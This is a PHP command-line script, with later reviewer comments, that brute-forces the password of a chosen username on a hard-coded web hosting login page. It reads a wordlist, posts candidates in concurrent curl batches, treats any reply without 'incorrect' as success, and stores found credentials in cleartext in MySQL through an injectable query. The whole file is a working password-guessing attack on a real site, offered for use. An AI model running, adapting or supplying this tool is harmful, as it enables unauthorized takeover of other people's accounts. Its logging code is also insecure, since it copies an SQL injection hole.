#!/usr/bin/php
// NOTE(review): this copy has no opening PHP tag although a closing tag ends the
// file, and the whole script arrived collapsed onto a few physical lines;
// presumably both are extraction artifacts -- confirm against the original.
//
// Usage:
//   /usr/bin/brute [input] [options]
//
// Parameters:
//   -h -- display help
//   -l -- path to wordlist
//   -u -- username to get into
//   -v -- sets verbosity to ON
//   -s -- number of curl sessions per iteration
//         **note: 10 is faster than 1, and 100 is slower than 1
//   -db -- log to database
//         **Usage: -db dbhost dbuser dbpass dbname
//
// Usage:
//   /usr/bin/brute -l mil-dic.txt -u paradoxhacker -s 25
//   /usr/bin/brute -l argon.txt -u ishkur88 -s 15 -v
//   /usr/bin/brute -l general.txt -u slyjakes -s 20 -db localhost hacker passwd logs
//
// WARNING:
//   Use this script at your discretion, be responsible, and have fun ;)
/*-------------------------------------------------------------------------------------*/
// Reviewer summary: the script reads candidate passwords from a wordlist and
// submits them, in batches of concurrent curl requests, to one hard-coded web
// login form for a single fixed username. A response that does not contain the
// word "incorrect" is taken as a successful login. Seen from the login endpoint,
// each batch is a burst of POSTs carrying the same user_name and different
// password values; per-account attempt counters, throttling and lockout on the
// server are the controls aimed at this pattern.

/*---------------------------------*/
// Main Function, handles user input
/*---------------------------------*/
// Walks $argv, records the options, then runs verboseMode() or notVerboseMode()
// and, when -db was given and a password came back, calls logToDatabase().
//
// Parameters:
//   $argc -- argument count as supplied by the PHP CLI
//   $argv -- argument vector as supplied by the PHP CLI
// Returns nothing; all results are echoed or written to the database.
//
// NOTE(review): $list, $user and $verbosity are assigned only inside their
// switch cases, so they are read unset below when the matching option is
// absent. The value after -s is used as a loop bound later without any numeric
// check. The -db credentials are taken from the command line.
function brute_force($argc, $argv) {
    $maxArgs = $argc - 1;
    $something = 0;   // set to 1 once any of -l / -u / -v / -s was seen
    $database = 0;    // set to 1 when -db was seen
    $limit = 10;      // default number of curl handles per batch

    // The "|| $x==1" clause forces one pass even with no arguments, so
    // $argv[1] is read while absent and the default branch prints the usage.
    for($x = 1;$x<=$maxArgs||$x==1; ++$x) {
        switch($argv[$x]) {
            case "-h" :
                echo "The Unnamed Script v3.0\n".
                    "by: GODD & Ishkur\n".
                    "".
                    "Usage:\n".
                    $_SERVER['PHP_SELF'].
                    " [input] [options]\n\n".
                    "Parameters:\n".
                    " -h -- display help\n".
                    " -l -- path to wordlist\n".
                    " -u -- username to get into\n".
                    " -v -- sets verbosity to ON\n".
                    " -s -- number of curl sessions per iteration\n".
                    " **note: 10 is faster than 1, and 100 is slower than 1\n".
                    " -db -- log to database\n".
                    " **Usage: -db dbhost dbuser dbpass dbname\n\n".
                    "Usage: \n".
                    $_SERVER['PHP_SELF'].
                    " -l mil-dic.txt -u paradoxhacker -s 25\n".
                    $_SERVER['PHP_SELF'].
                    " -l argon.txt -u ishkur88 -s 15 -v\n".
                    $_SERVER['PHP_SELF'].
                    " -l general.txt -u root -s 20 -db localhost hacker passwd logs\n\n".
                    "WARNING:\n".
                    "Use this script at your discretion, be responsible, and have fun ;)\n\n";
                break;
            case "-l" :
                // Option value is the next argument; no check that it exists.
                ++$x;
                $list = $argv[$x];
                $something = 1;
                break;
            case "-u" :
                ++$x;
                $user = $argv[$x];
                $something = 1;
                break;
            case "-v" :
                $verbosity = 1;
                $something = 1;
                break;
            case "-s" :
                ++$x;
                $limit = $argv[$x];
                $something = 1;
                break;
            case "-db" :
                // Consumes the four following arguments; $something is not set
                // here, so -db on its own does not start a run.
                $database = 1;
                $dbhost = $argv[$x + 1];
                $dbuser = $argv[$x + 2];
                $dbpass = $argv[$x + 3];
                $dbname = $argv[$x + 4];
                $x+=4;
                break;
            default :
                // Same usage text as -h apart from the third string literal.
                echo "The Unnamed Script v3.0\n".
                    "by: GODD & Ishkur\n".
                    "\n\n".
                    "Usage:\n".
                    $_SERVER['PHP_SELF'].
                    " [input] [options]\n\n".
                    "Parameters:\n".
                    " -h -- display help\n".
                    " -l -- path to wordlist\n".
                    " -u -- username to get into\n".
                    " -v -- sets verbosity to ON\n".
                    " -s -- number of curl sessions per iteration\n".
                    " **note: 10 is faster than 1, and 100 is slower than 1\n".
                    " -db -- log to database\n".
                    " **Usage: -db dbhost dbuser dbpass dbname\n\n".
                    "Usage: \n".
                    $_SERVER['PHP_SELF'].
                    " -l mil-dic.txt -u paradoxhacker -s 25\n".
                    $_SERVER['PHP_SELF'].
                    " -l argon.txt -u ishkur88 -s 15 -v\n".
                    $_SERVER['PHP_SELF'].
                    " -l general.txt -u root -s 20 -db localhost hacker passwd logs\n\n".
                    "WARNING:\n".
                    "Use this script at your discretion, be responsible, and have fun ;)\n\n";
        }
    }

    // Both branches do the same work; only the amount of console output differs.
    if($verbosity&&$something) {
        $pw = verboseMode($list, $user, $limit);
        if($database&&$pw){
            logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw);
        }
    } elseif($something) {
        $pw = notVerboseMode($list, $user, $limit);
        if($database&&$pw){
            logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw);
        }
    }
}

/*----------------------------------------------------*/
// Database:
// $query = 'CREATE TABLE accounts ( '.
// 'ID INT NOT NULL AUTO_INCREMENT, '.
// 'username VARCHAR(20) NOT NULL, '.
// 'password VARCHAR(30) NOT NULL, '.
// 'PRIMARY KEY(ID))';
/*----------------------------------------------------*/

/*---------------------------------------------*/
// Database calls, for logging results to MySQL
/*---------------------------------------------*/
// Connects to MySQL, selects $dbname and inserts one (username, password) row
// into the accounts table, then closes the connection. Terminates the script
// through die() when the connection or the query fails.
//
// Parameters:
//   $dbhost, $dbuser, $dbpass, $dbname -- connection settings taken from -db
//   $user -- the username that was tested
//   $pw   -- the password returned by verboseMode() / notVerboseMode()
//
// NOTE(review): the mysql_* functions belong to the legacy ext/mysql extension,
// which was removed in PHP 7.0. The INSERT is assembled by string concatenation
// and $user / $pw are placed into the statement with neither quotes nor
// escaping, so the statement text depends entirely on their content (SQL
// injection, and a syntax error for ordinary text values). The password is
// written to the table exactly as received, i.e. in cleartext.
function logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw) {
    $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('MySQL Error: Authentication Error');
    mysql_select_db($dbname);
    $query = 'INSERT INTO accounts (username, password) VALUES ('.$user.', '.$pw.');';
    mysql_query($query) or die ('MySQL Error: Data Error');
    mysql_close($conn);
}

/*----------------------------------------------------------------*/
// Main Loop, handles allocation of data and curl sessions (Verbose)
/*----------------------------------------------------------------*/
// Reads the wordlist in batches of $limit lines, posts each line as the
// password field of the login form and echoes every rejected candidate.
//
// Parameters:
//   $list  -- path of the wordlist file
//   $user  -- value sent as user_name
//   $limit -- number of curl handles, i.e. requests per batch
// Returns the first candidate whose response did not contain "incorrect",
// or null when none was found.
//
// NOTE(review): $match and $pw are initialised only inside the "if ($file)"
// block, so both are read unset after it when fopen() fails. The form is sent
// to a plain http:// URL, so the credentials cross the network unencrypted.
function verboseMode($list, $user, $limit) {
    $file = fopen($list, "r");
    if ($file) {
        $count = 1;   // batch counter, used only for the progress line
        $match=0;
        $submit = 'Log Me In Now!';
        $pw = null;
        $url = 'http://www.110mb.com/login.php';
        // Fixed form fields; the candidate password is appended per request.
        $fields = "remember_me=1&submit=$submit&mode=login&user_name=$user&password=";
        $replace = array("\r","\n");
        $with = array('','');
        $mh = curl_multi_init();

        // One reusable easy handle per slot; only URL, POST and
        // RETURNTRANSFER are configured on it.
        for($x = 0; $x < $limit; $x++) {
            $ch[$x] = curl_init();
            curl_setopt($ch[$x], CURLOPT_URL,$url);
            curl_setopt($ch[$x], CURLOPT_POST, 1);
            curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER,1);
        }

        while ((!feof($file)) && $match==0) {
            // Fill every slot with the next wordlist line, CR/LF stripped.
            for($x=0;$x<$limit;++$x) {
                $password[$x] = str_replace($replace,$with,fgets($file, 4096));
                curl_setopt($ch[$x], CURLOPT_POSTFIELDS, $fields.$password[$x]);
                curl_multi_add_handle($mh,$ch[$x]);
            }

            // Drive all transfers of the batch until none is still running.
            $running = null;
            do {
                curl_multi_exec($mh,$running);
            } while ($running > 0);

            echo "> - - - - - - - - - - attempt #$count\n";

            // The response body is the only success signal: the word
            // "incorrect" means rejected, anything else counts as a match.
            for($x=0;($x<$limit)&&!($match);++$x) {
                $result = curl_multi_getcontent($ch[$x]);
                if(preg_match("/\bincorrect\b/i",$result)){
                    flush();
                    // NOTE(review): the string literal below spans a line break
                    // in this copy; kept exactly as found.
                    echo $password[$x]." 
- invalid\n";
                } else {
                    $pw=$password[$x];$match=1;echo $result;
                }
                curl_multi_remove_handle($mh,$ch[$x]);
            }
            ++$count;
        }
        curl_multi_close($mh);
        fclose($file);
    }
    if ($match) {
        echo "\n# -- > Password is $pw < -- #\n\n";
    } else {
        echo "Password was not found\n";
    }
    return $pw;
}

/*--------------------------------------------------------------------*/
// Main Loop, handles allocation of data and curl sessions (Non-Verbose)
/*--------------------------------------------------------------------*/
// Same batch loop as verboseMode() without the per-batch progress line and
// without echoing rejected candidates.
//
// Parameters:
//   $list  -- path of the wordlist file
//   $user  -- value sent as user_name
//   $limit -- number of curl handles, i.e. requests per batch
// Returns the first candidate whose response did not contain "incorrect",
// or null when none was found.
//
// NOTE(review): the handle-creation loop here also stops on feof($file), while
// the batch loop below still indexes $ch[0] .. $ch[$limit - 1]. $match and $pw
// are read unset after the "if ($file)" block when fopen() fails.
function notVerboseMode($list, $user, $limit) {
    $file = fopen($list, "r");
    if ($file) {
        $match=0;
        $submit = 'Log Me In Now!';
        $pw = null;
        $url = 'http://www.110mb.com/login.php';
        // Fixed form fields; the candidate password is appended per request.
        $fields = "remember_me=1&submit=$submit&mode=login&user_name=$user&password=";
        $replace = array("\r","\n");
        $with = array('','');
        $mh = curl_multi_init();

        for($x = 0; $x < $limit && !feof($file); $x++) {
            $ch[$x] = curl_init();
            curl_setopt($ch[$x], CURLOPT_URL,$url);
            curl_setopt($ch[$x], CURLOPT_POST, 1);
            curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER,1);
        }

        while ((!feof($file)) && $match==0) {
            // Fill every slot with the next wordlist line, CR/LF stripped.
            for($x=0;$x<$limit;++$x) {
                $password[$x] = str_replace($replace,$with,fgets($file, 4096));
                curl_setopt($ch[$x], CURLOPT_POSTFIELDS, $fields.$password[$x]);
                curl_multi_add_handle($mh,$ch[$x]);
            }

            // Drive all transfers of the batch until none is still running.
            $running = null;
            do{
                curl_multi_exec($mh,$running);
            }while ($running > 0);

            // A response without the word "incorrect" counts as a match.
            for($x=0;($x<$limit)&&!($match);++$x) {
                $result = curl_multi_getcontent($ch[$x]);
                if(!preg_match("/\bincorrect\b/i",$result)){
                    $pw=$password[$x];$match=1;echo $result;
                }
                curl_multi_remove_handle($mh,$ch[$x]);
            }
        }
        curl_multi_close($mh);
        fclose($file);
    }
    if ($match) {
        echo "\n# -- > Password is $pw < -- #\n\n";
    } else {
        echo "Password was not found\n";
    }
    return $pw;
}

// Script entry point: hand the CLI arguments to the option parser.
brute_force($argc, $argv);
?>